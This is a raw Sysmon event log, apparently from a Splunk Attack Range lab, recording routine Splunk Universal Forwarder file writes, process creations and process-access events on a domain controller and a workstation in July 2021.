Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6E2690AC2424BD01369D6410C7A16AA6,SHA256=CCC21F3B371DCF0BC75B1ACF29798174CD941F570E451A31A94D5D14890155A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054683Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:47.527{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91526B53DDC3591D4F9D22DB108B315A,SHA256=A2F707849662725376148E6D84627320A373B5A0B5CD897D182F0FA0CC448B57,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810396Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:47.251{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=374FFFB0A9BCCC301ECAC1BC7C01B6B7,SHA256=769671FECF8B07B182BD1627AC272832B972D7A9F4579C3EC1481A0084514554,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810397Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:48.251{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3C26ADDE368DD4935C396D083C4118D,SHA256=C089668B7E5BFF9D198EC2676943A19C6C917F52EACA2E222079AACB488F8A21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054685Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:48.532{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C303D979EDA8471F400FCFF0305515E,SHA256=73B8E495C2465F9FFEFB6B06545DCB71C20BCBAC466F004E78B3468A0350440E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810398Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:49.298{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC2D9D65EE52F5CD37C81959D93E75B6,SHA256=77983D65EB809DE9F19568930C34F27F322A8842BEE6EE6AC62588E45261F355,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054686Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:49.550{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E908B35B1CA8BB86EF6FC893C1E1F76,SHA256=A4B95C6E4BF3931D896DF911ABE957E147864501B8BA973D897EB77C8689092E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054704Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.773{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F856-60EB-F37D-00000000CF01}5752C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054703Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.773{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054702Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:50.773{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054701Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.773{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054700Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:50.773{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054699Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.773{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F856-60EB-F37D-00000000CF01}5752C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054698Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.757{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F856-60EB-F37D-00000000CF01}5752C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054697Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.759{466BC892-F856-60EB-F37D-00000000CF01}5752C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001054696Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.588{466BC892-F856-60EB-F27D-00000000CF01}101249508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054695Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.573{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08BC543EC0E92A1759585B3183E7E23A,SHA256=109BE6D7B7FCE5E667ED286BB42D25D2AD1E40E9848AFFDE85C4B74BF79254B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810399Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:50.314{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4D062A6445AEE046E86C9A7318D0303,SHA256=AC0388033A361D4EB72A1F5BB5CEAC40A48733EF9A79973880FFE02F8B8D9A61,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054694Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.218{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F856-60EB-F27D-00000000CF01}10124C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054693Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:50.218{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054692Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.218{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054691Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:50.218{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054690Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.218{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F856-60EB-F27D-00000000CF01}10124C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054689Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:50.218{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054688Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.218{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F856-60EB-F27D-00000000CF01}10124C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054687Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.205{466BC892-F856-60EB-F27D-00000000CF01}10124C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001054715Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:51.888{466BC892-F857-60EB-F47D-00000000CF01}55567576C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054714Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:51.657{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F857-60EB-F47D-00000000CF01}5556C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054713Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:51.641{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054712Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:51.641{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054711Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:51.641{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054710Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:51.641{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F857-60EB-F47D-00000000CF01}5556C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054709Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:51.641{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 